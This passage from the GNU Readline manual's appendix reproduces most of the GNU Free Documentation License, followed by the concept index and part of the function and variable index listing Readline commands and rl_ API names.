to the Document’s overall subject (or to related matters) and contains nothing that
could fall directly within that overall subject. (Thus, if the Document is in part a
textbook of mathematics, a Secondary Section may not explain any mathematics.) The
relationship could be a matter of historical connection with the subject or with related
matters, or of legal, commercial, philosophical, ethical or political position regarding
them.
The “Invariant Sections” are certain Secondary Sections whose titles are designated, as
being those of Invariant Sections, in the notice that says that the Document is released
Appendix A: GNU Free Documentation License
57
under this License. If a section does not fit the above definition of Secondary then it is
not allowed to be designated as Invariant. The Document may contain zero Invariant
Sections. If the Document does not identify any Invariant Sections then there are none.
The “Cover Texts” are certain short passages of text that are listed, as Front-Cover
Texts or Back-Cover Texts, in the notice that says that the Document is released under
this License. A Front-Cover Text may be at most 5 words, and a Back-Cover Text may
be at most 25 words.
A “Transparent” copy of the Document means a machine-readable copy, represented
in a format whose specification is available to the general public, that is suitable for
revising the document straightforwardly with generic text editors or (for images com-
posed of pixels) generic paint programs or (for drawings) some widely available drawing
editor, and that is suitable for input to text formatters or for automatic translation to
a variety of formats suitable for input to text formatters. A copy made in an otherwise
Transparent file format whose markup, or absence of markup, has been arranged to
thwart or discourage subsequent modification by readers is not Transparent. An image
format is not Transparent if used for any substantial amount of text. A copy that is
not “Transparent” is called “Opaque”.
Examples of suitable formats for Transparent copies include plain ascii without
markup, Texinfo input format, LaTEX input format, SGML or XML using a publicly
available DTD, and standard-conforming simple HTML, PostScript or PDF designed
for human modification. Examples of transparent image formats include PNG, XCF
and JPG. Opaque formats include proprietary formats that can be read and edited
only by proprietary word processors, SGML or XML for which the DTD and/or
processing tools are not generally available, and the machine-generated HTML,
PostScript or PDF produced by some word processors for output purposes only.
The “Title Page” means, for a printed book, the title page itself, plus such following
pages as are needed to hold, legibly, the material this License requires to appear in the
title page. For works in formats which do not have any title page as such, “Title Page”
means the text near the most prominent appearance of the work’s title, preceding the
beginning of the body of the text.
The “publisher” means any person or entity that distributes copies of the Document
to the public.
A section “Entitled XYZ” means a named subunit of the Document whose title either
is precisely XYZ or contains XYZ in parentheses following text that translates XYZ in
another language. (Here XYZ stands for a specific section name mentioned below, such
as “Acknowledgements”, “Dedications”, “Endorsements”, or “History”.) To “Preserve
the Title” of such a section when you modify the Document means that it remains a
section “Entitled XYZ” according to this definition.
The Document may include Warranty Disclaimers next to the notice which states that
this License applies to the Document. These Warranty Disclaimers are considered to
be included by reference in this License, but only as regards disclaiming warranties:
any other implication that these Warranty Disclaimers may have is void and has no
effect on the meaning of this License.
2. VERBATIM COPYING
Appendix A: GNU Free Documentation License
58
You may copy and distribute the Document in any medium, either commercially or
noncommercially, provided that this License, the copyright notices, and the license
notice saying this License applies to the Document are reproduced in all copies, and
that you add no other conditions whatsoever to those of this License. You may not use
technical measures to obstruct or control the reading or further copying of the copies
you make or distribute. However, you may accept compensation in exchange for copies.
If you distribute a large enough number of copies you must also follow the conditions
in section 3.
You may also lend copies, under the same conditions stated above, and you may publicly
display copies.
3. COPYING IN QUANTITY
If you publish printed copies (or copies in media that commonly have printed covers) of
the Document, numbering more than 100, and the Document’s license notice requires
Cover Texts, you must enclose the copies in covers that carry, clearly and legibly, all
these Cover Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on
the back cover. Both covers must also clearly and legibly identify you as the publisher
of these copies. The front cover must present the full title with all words of the title
equally prominent and visible. You may add other material on the covers in addition.
Copying with changes limited to the covers, as long as they preserve the title of the
Document and satisfy these conditions, can be treated as verbatim copying in other
respects.
If the required texts for either cover are too voluminous to fit legibly, you should put
the first ones listed (as many as fit reasonably) on the actual cover, and continue the
rest onto adjacent pages.
If you publish or distribute Opaque copies of the Document numbering more than 100,
you must either include a machine-readable Transparent copy along with each Opaque
copy, or state in or with each Opaque copy a computer-network location from which
the general network-using public has access to download using public-standard network
protocols a complete Transparent copy of the Document, free of added material. If
you use the latter option, you must take reasonably prudent steps, when you begin
distribution of Opaque copies in quantity, to ensure that this Transparent copy will
remain thus accessible at the stated location until at least one year after the last time
you distribute an Opaque copy (directly or through your agents or retailers) of that
edition to the public.
It is requested, but not required, that you contact the authors of the Document well
before redistributing any large number of copies, to give them a chance to provide you
with an updated version of the Document.
4. MODIFICATIONS
You may copy and distribute a Modified Version of the Document under the conditions
of sections 2 and 3 above, provided that you release the Modified Version under precisely
this License, with the Modified Version filling the role of the Document, thus licensing
distribution and modification of the Modified Version to whoever possesses a copy of
it. In addition, you must do these things in the Modified Version:
A. Use in the Title Page (and on the covers, if any) a title distinct from that of the
Document, and from those of previous versions (which should, if there were any,
Appendix A: GNU Free Documentation License
59
be listed in the History section of the Document). You may use the same title as
a previous version if the original publisher of that version gives permission.
B. List on the Title Page, as authors, one or more persons or entities responsible for
authorship of the modifications in the Modified Version, together with at least five
of the principal authors of the Document (all of its principal authors, if it has fewer
than five), unless they release you from this requirement.
C. State on the Title page the name of the publisher of the Modified Version, as the
publisher.
D. Preserve all the copyright notices of the Document.
E. Add an appropriate copyright notice for your modifications adjacent to the other
copyright notices.
F. Include, immediately after the copyright notices, a license notice giving the public
permission to use the Modified Version under the terms of this License, in the form
shown in the Addendum below.
G. Preserve in that license notice the full lists of Invariant Sections and required Cover
Texts given in the Document’s license notice.
H. Include an unaltered copy of this License.
I. Preserve the section Entitled “History”, Preserve its Title, and add to it an item
stating at least the title, year, new authors, and publisher of the Modified Version
as given on the Title Page. If there is no section Entitled “History” in the Docu-
ment, create one stating the title, year, authors, and publisher of the Document
as given on its Title Page, then add an item describing the Modified Version as
stated in the previous sentence.
J. Preserve the network location, if any, given in the Document for public access to
a Transparent copy of the Document, and likewise the network locations given in
the Document for previous versions it was based on. These may be placed in the
“History” section. You may omit a network location for a work that was published
at least four years before the Document itself, or if the original publisher of the
version it refers to gives permission.
K. For any section Entitled “Acknowledgements” or “Dedications”, Preserve the Title
of the section, and preserve in the section all the substance and tone of each of the
contributor acknowledgements and/or dedications given therein.
L. Preserve all the Invariant Sections of the Document, unaltered in their text and
in their titles. Section numbers or the equivalent are not considered part of the
section titles.
M. Delete any section Entitled “Endorsements”. Such a section may not be included
in the Modified Version.
N. Do not retitle any existing section to be Entitled “Endorsements” or to conflict in
title with any Invariant Section.
O. Preserve any Warranty Disclaimers.
If the Modified Version includes new front-matter sections or appendices that qualify
as Secondary Sections and contain no material copied from the Document, you may at
your option designate some or all of these sections as invariant. To do this, add their
Appendix A: GNU Free Documentation License
60
titles to the list of Invariant Sections in the Modified Version’s license notice. These
titles must be distinct from any other section titles.
You may add a section Entitled “Endorsements”, provided it contains nothing but
endorsements of your Modified Version by various parties—for example, statements of
peer review or that the text has been approved by an organization as the authoritative
definition of a standard.
You may add a passage of up to five words as a Front-Cover Text, and a passage of up
to 25 words as a Back-Cover Text, to the end of the list of Cover Texts in the Modified
Version. Only one passage of Front-Cover Text and one of Back-Cover Text may be
added by (or through arrangements made by) any one entity. If the Document already
includes a cover text for the same cover, previously added by you or by arrangement
made by the same entity you are acting on behalf of, you may not add another; but
you may replace the old one, on explicit permission from the previous publisher that
added the old one.
The author(s) and publisher(s) of the Document do not by this License give permission
to use their names for publicity for or to assert or imply endorsement of any Modified
Version.
5. COMBINING DOCUMENTS
You may combine the Document with other documents released under this License,
under the terms defined in section 4 above for modified versions, provided that you
include in the combination all of the Invariant Sections of all of the original documents,
unmodified, and list them all as Invariant Sections of your combined work in its license
notice, and that you preserve all their Warranty Disclaimers.
The combined work need only contain one copy of this License, and multiple identical
Invariant Sections may be replaced with a single copy. If there are multiple Invariant
Sections with the same name but different contents, make the title of each such section
unique by adding at the end of it, in parentheses, the name of the original author or
publisher of that section if known, or else a unique number. Make the same adjustment
to the section titles in the list of Invariant Sections in the license notice of the combined
work.
In the combination, you must combine any sections Entitled “History” in the vari-
ous original documents, forming one section Entitled “History”; likewise combine any
sections Entitled “Acknowledgements”, and any sections Entitled “Dedications”. You
must delete all sections Entitled “Endorsements.”
6. COLLECTIONS OF DOCUMENTS
You may make a collection consisting of the Document and other documents released
under this License, and replace the individual copies of this License in the various
documents with a single copy that is included in the collection, provided that you
follow the rules of this License for verbatim copying of each of the documents in all
other respects.
You may extract a single document from such a collection, and distribute it individu-
ally under this License, provided you insert a copy of this License into the extracted
document, and follow this License in all other respects regarding verbatim copying of
that document.
Appendix A: GNU Free Documentation License
61
7. AGGREGATION WITH INDEPENDENT WORKS
A compilation of the Document or its derivatives with other separate and independent
documents or works, in or on a volume of a storage or distribution medium, is called
an “aggregate” if the copyright resulting from the compilation is not used to limit the
legal rights of the compilation’s users beyond what the individual works permit. When
the Document is included in an aggregate, this License does not apply to the other
works in the aggregate which are not themselves derivative works of the Document.
If the Cover Text requirement of section 3 is applicable to these copies of the Document,
then if the Document is less than one half of the entire aggregate, the Document’s Cover
Texts may be placed on covers that bracket the Document within the aggregate, or the
electronic equivalent of covers if the Document is in electronic form. Otherwise they
must appear on printed covers that bracket the whole aggregate.
8. TRANSLATION
Translation is considered a kind of modification, so you may distribute translations
of the Document under the terms of section 4.
Replacing Invariant Sections with
translations requires special permission from their copyright holders, but you may
include translations of some or all Invariant Sections in addition to the original versions
of these Invariant Sections. You may include a translation of this License, and all the
license notices in the Document, and any Warranty Disclaimers, provided that you
also include the original English version of this License and the original versions of
those notices and disclaimers. In case of a disagreement between the translation and
the original version of this License or a notice or disclaimer, the original version will
prevail.
If a section in the Document is Entitled “Acknowledgements”, “Dedications”, or “His-
tory”, the requirement (section 4) to Preserve its Title (section 1) will typically require
changing the actual title.
9. TERMINATION
You may not copy, modify, sublicense, or distribute the Document except as expressly
provided under this License. Any attempt otherwise to copy, modify, sublicense, or
distribute it is void, and will automatically terminate your rights under this License.
However, if you cease all violation of this License, then your license from a particular
copyright holder is reinstated (a) provisionally, unless and until the copyright holder
explicitly and finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means prior to 60 days
after the cessation.
Moreover, your license from a particular copyright holder is reinstated permanently if
the copyright holder notifies you of the violation by some reasonable means, this is the
first time you have received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after your receipt of the
notice.
Termination of your rights under this section does not terminate the licenses of parties
who have received copies or rights from you under this License. If your rights have
been terminated and not permanently reinstated, receipt of a copy of some or all of the
same material does not give you any rights to use it.
Appendix A: GNU Free Documentation License
62
10. FUTURE REVISIONS OF THIS LICENSE
The Free Software Foundation may publish new, revised versions of the GNU Free
Documentation License from time to time. Such new versions will be similar in spirit
to the present version, but may differ in detail to address new problems or concerns.
See http://www.gnu.org/copyleft/.
Each version of the License is given a distinguishing version number. If the Document
specifies that a particular numbered version of this License “or any later version”
applies to it, you have the option of following the terms and conditions either of that
specified version or of any later version that has been published (not as a draft) by
the Free Software Foundation. If the Document does not specify a version number of
this License, you may choose any version ever published (not as a draft) by the Free
Software Foundation. If the Document specifies that a proxy can decide which future
versions of this License can be used, that proxy’s public statement of acceptance of a
version permanently authorizes you to choose that version for the Document.
11. RELICENSING
“Massive Multiauthor Collaboration Site” (or “MMC Site”) means any World Wide
Web server that publishes copyrightable works and also provides prominent facilities
for anybody to edit those works. A public wiki that anybody can edit is an example of
such a server. A “Massive Multiauthor Collaboration” (or “MMC”) contained in the
site means any set of copyrightable works thus published on the MMC site.
“CC-BY-SA” means the Creative Commons Attribution-Share Alike 3.0 license pub-
lished by Creative Commons Corporation, a not-for-profit corporation with a principal
place of business in San Francisco, California, as well as future copyleft versions of that
license published by that same organization.
“Incorporate” means to publish or republish a Document, in whole or in part, as part
of another Document.
An MMC is “eligible for relicensing” if it is licensed under this License, and if all works
that were first published under this License somewhere other than this MMC, and
subsequently incorporated in whole or in part into the MMC, (1) had no cover texts
or invariant sections, and (2) were thus incorporated prior to November 1, 2008.
The operator of an MMC Site may republish an MMC contained in the site under
CC-BY-SA on the same site at any time before August 1, 2009, provided the MMC is
eligible for relicensing.
Appendix A: GNU Free Documentation License
63
ADDENDUM: How to use this License for your documents
To use this License in a document you have written, include a copy of the License in the
document and put the following copyright and license notices just after the title page:
Copyright (C)
year
your name.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3
or any later version published by the Free Software Foundation;
with no Invariant Sections, no Front-Cover Texts, and no Back-Cover
Texts.
A copy of the license is included in the section entitled ‘‘GNU
Free Documentation License’’.
If you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace the
“with. . .Texts.” line with this:
with the Invariant Sections being list their titles, with
the Front-Cover Texts being list, and with the Back-Cover Texts
being list.
If you have Invariant Sections without Cover Texts, or some other combination of the
three, merge those two alternatives to suit the situation.
If your document contains nontrivial examples of program code, we recommend releasing
these examples in parallel under your choice of free software license, such as the GNU
General Public License, to permit their use in free software.
Concept Index
64
Concept Index
A
application-specific completion functions . . . . . . . 41
C
command editing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
E
editing command lines . . . . . . . . . . . . . . . . . . . . . . . . . . 1
I
initialization file, readline . . . . . . . . . . . . . . . . . . . . . . . 4
interaction, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
K
kill ring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
killing text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
N
notation, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
R
readline, function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
V
variables, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Y
yanking text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Function and Variable Index
65
Function and Variable Index
_rl_digit_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_digit_value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_lowercase_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_to_lower . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_to_upper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_uppercase_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
A
abort (C-g) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
accept-line (Newline or Return). . . . . . . . . . . . . 13
B
backward-char (C-b). . . . . . . . . . . . . . . . . . . . . . . . . . 13
backward-delete-char (Rubout) . . . . . . . . . . . . . . 15
backward-kill-line (C-x Rubout) . . . . . . . . . . . . 16
backward-kill-word (M-DEL). . . . . . . . . . . . . . . . . . 16
backward-word (M-b). . . . . . . . . . . . . . . . . . . . . . . . . . 13
beginning-of-history (M-<). . . . . . . . . . . . . . . . . . 14
beginning-of-line (C-a) . . . . . . . . . . . . . . . . . . . . . 13
bell-style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
bind-tty-special-chars . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
C
call-last-kbd-macro (C-x e) . . . . . . . . . . . . . . . . . 18
capitalize-word (M-c) . . . . . . . . . . . . . . . . . . . . . . . 15
character-search (C-]) . . . . . . . . . . . . . . . . . . . . . . 18
character-search-backward (M-C-]). . . . . . . . . . 18
clear-screen (C-l). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
comment-begin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
complete (TAB) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
completion-prefix-display-length. . . . . . . . . . . . . . . . . 5
completion-query-items . . . . . . . . . . . . . . . . . . . . . . . . . 5
convert-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
copy-backward-word () . . . . . . . . . . . . . . . . . . . . . . . 16
copy-forward-word () . . . . . . . . . . . . . . . . . . . . . . . . 16
copy-region-as-kill () . . . . . . . . . . . . . . . . . . . . . . 16
D
delete-char (C-d) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
delete-char-or-list () . . . . . . . . . . . . . . . . . . . . . . 17
delete-horizontal-space (). . . . . . . . . . . . . . . . . . 16
digit-argument (M-0, M-1, ... M--). . . . . . . . . . 17
disable-completion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
do-uppercase-version (M-a, M-b, M-x, ...)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
downcase-word (M-l). . . . . . . . . . . . . . . . . . . . . . . . . . 15
dump-functions () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
dump-macros () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
dump-variables () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
E
editing-mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
emacs-editing-mode (C-e) . . . . . . . . . . . . . . . . . . . . 19
enable-keypad . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
end-kbd-macro (C-x )). . . . . . . . . . . . . . . . . . . . . . . . 18
end-of-history (M->) . . . . . . . . . . . . . . . . . . . . . . . . 14
end-of-line (C-e) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
exchange-point-and-mark (C-x C-x) . . . . . . . . . . 18
expand-tilde . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
F
forward-backward-delete-char () . . . . . . . . . . . . 15
forward-char (C-f). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
forward-search-history (C-s) . . . . . . . . . . . . . . . 14
forward-word (M-f). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
H
history-preserve-point. . . . . . . . . . . . . . . . . . . . . . . . . . . 6
history-search-backward (). . . . . . . . . . . . . . . . . . 14
history-search-forward (). . . . . . . . . . . . . . . . . . . 14
history-size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
horizontal-scroll-mode . . . . . . . . . . . . . . . . . . . . . . . . . . 6
I
input-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
insert-comment (M-#) . . . . . . . . . . . . . . . . . . . . . . . . 19
insert-completions (M-*) . . . . . . . . . . . . . . . . . . . . 17
isearch-terminators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
K
keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
kill-line (C-k) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-region () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-whole-line (). . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-word (M-d) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
M
mark-modified-lines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
mark-symlinked-directories. . . . . . . . . . . . . . . . . . . . . . 7
match-hidden-files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
menu-complete () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
menu-complete-backward (). . . . . . . . . . . . . . . . . . . 17
meta-flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Function and Variable Index
66
N
next-history (C-n). . . . . . . . . . . . . . . . . . . . . . . . . . . 14
non-incremental-forward-search-history (M-n)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
non-incremental-reverse-search-history (M-p)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
O
output-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
overwrite-mode () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
P
page-completions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
possible-completions (M-?). . . . . . . . . . . . . . . . . . 17
prefix-meta (ESC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
previous-history (C-p) . . . . . . . . . . . . . . . . . . . . . . 13
Q
quoted-insert (C-q or C-v) . . . . . . . . . . . . . . . . . . 15
R
re-read-init-file (C-x C-r) . . . . . . . . . . . . . . . . . 18
readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
redraw-current-line () . . . . . . . . . . . . . . . . . . . . . . 13
reverse-search-history (C-r) . . . . . . . . . . . . . . . 14
revert-all-at-newline . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
revert-line (M-r) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
rl_add_defun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_add_funmap_entry . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_add_undo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_alphabetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_already_prompted . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_attempted_completion_function . . . . . . . . . . 43
rl_attempted_completion_over . . . . . . . . . . . . . . . 47
rl_basic_quote_characters . . . . . . . . . . . . . . . . . . 45
rl_basic_word_break_characters. . . . . . . . . . . . . 45
rl_begin_undo_group . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_bind_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_key_if_unbound . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_key_if_unbound_in_map. . . . . . . . . . . . . . 29
rl_bind_key_in_map . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_keyseq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_keyseq_if_unbound . . . . . . . . . . . . . . . . . . 30
rl_bind_keyseq_if_unbound_in_map . . . . . . . . . . 30
rl_bind_keyseq_in_map . . . . . . . . . . . . . . . . . . . . . . . 30
rl_binding_keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_callback_handler_install . . . . . . . . . . . . . . . . 37
rl_callback_handler_remove . . . . . . . . . . . . . . . . . 37
rl_callback_read_char . . . . . . . . . . . . . . . . . . . . . . . 37
rl_catch_signals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
rl_catch_sigwinch. . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_char_is_quoted_p . . . . . . . . . . . . . . . . . . . . . . . . . 44
rl_cleanup_after_signal. . . . . . . . . . . . . . . . . . . . . 40
rl_clear_message. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_clear_pending_input . . . . . . . . . . . . . . . . . . . . . . 34
rl_clear_signals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
rl_complete . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_complete_internal . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completer_quote_characters. . . . . . . . . . . . . . 45
rl_completer_word_break_characters . . . . . . . . 45
rl_completion_append_character. . . . . . . . . . . . . 45
rl_completion_display_matches_hook . . . . . . . . 44
rl_completion_entry_function . . . . . . . . . . . 42, 43
rl_completion_found_quote . . . . . . . . . . . . . . . . . . 46
rl_completion_invoking_key . . . . . . . . . . . . . . . . . 47
rl_completion_mark_symlink_dirs . . . . . . . . . . . 46
rl_completion_matches . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completion_mode . . . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completion_query_items . . . . . . . . . . . . . . . . . . 45
rl_completion_quote_character. . . . . . . . . . . . . . 46
rl_completion_suppress_append. . . . . . . . . . . . . . 46
rl_completion_suppress_quote . . . . . . . . . . . . . . . 46
rl_completion_type . . . . . . . . . . . . . . . . . . . . . . . . . . 47
rl_completion_word_break_hook. . . . . . . . . . . . . . 45
rl_copy_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_copy_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_crlf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_delete_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_deprep_term_function. . . . . . . . . . . . . . . . . . . . . 25
rl_deprep_terminal . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_ding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_directory_completion_hook . . . . . . . . . . . . . . . 44
rl_discard_keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_display_match_list . . . . . . . . . . . . . . . . . . . . . . . 36
rl_display_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_do_undo. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_done . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_echo_signal_char . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_editing_mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_end . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_end_undo_group. . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_erase_empty_line . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_event_hook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_execute_next . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_executing_keymap . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_executing_macro . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_expand_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_explicit_arg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_extend_line_buffer . . . . . . . . . . . . . . . . . . . . . . . 35
rl_filename_completion_desired. . . . . . . . . . . . . 46
rl_filename_completion_function . . . . . . . . . . . 43
rl_filename_dequoting_function. . . . . . . . . . . . . 43
rl_filename_quote_characters . . . . . . . . . . . . . . . 45
rl_filename_quoting_desired . . . . . . . . . . . . . . . . 46
rl_filename_quoting_function . . . . . . . . . . . . . . . 43
rl_filename_rewrite_hook . . . . . . . . . . . . . . . . . . . 44
rl_forced_update_display . . . . . . . . . . . . . . . . . . . 32
rl_free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_free_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_free_line_state . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Function and Variable Index
67
rl_free_undo_list. . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_function_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_function_of_keyseq . . . . . . . . . . . . . . . . . . . . . . . 30
rl_funmap_names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_generic_bind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_get_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_keymap_by_name . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_keymap_name . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_screen_size . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_get_termcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
rl_getc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_getc_function. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_gnu_readline_p. . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_ignore_completion_duplicates . . . . . . . . . . . 46
rl_ignore_some_completions_function . . . . . . . 44
rl_inhibit_completion . . . . . . . . . . . . . . . . . . . . . . . 47
rl_initialize . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_insert_completions . . . . . . . . . . . . . . . . . . . . . . . 42
rl_insert_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_instream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_invoking_keyseqs . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_invoking_keyseqs_in_map . . . . . . . . . . . . . . . . . 31
rl_kill_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_last_func . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_library_version . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_line_buffer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_list_funmap_names . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_macro_bind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_macro_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_make_bare_keymap . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_make_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_mark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_message. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_modifying . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_named_function. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_num_chars_to_read . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_numeric_arg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_on_new_line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_on_new_line_with_prompt . . . . . . . . . . . . . . . . . 32
rl_outstream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_parse_and_bind. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_pending_input. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_point . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
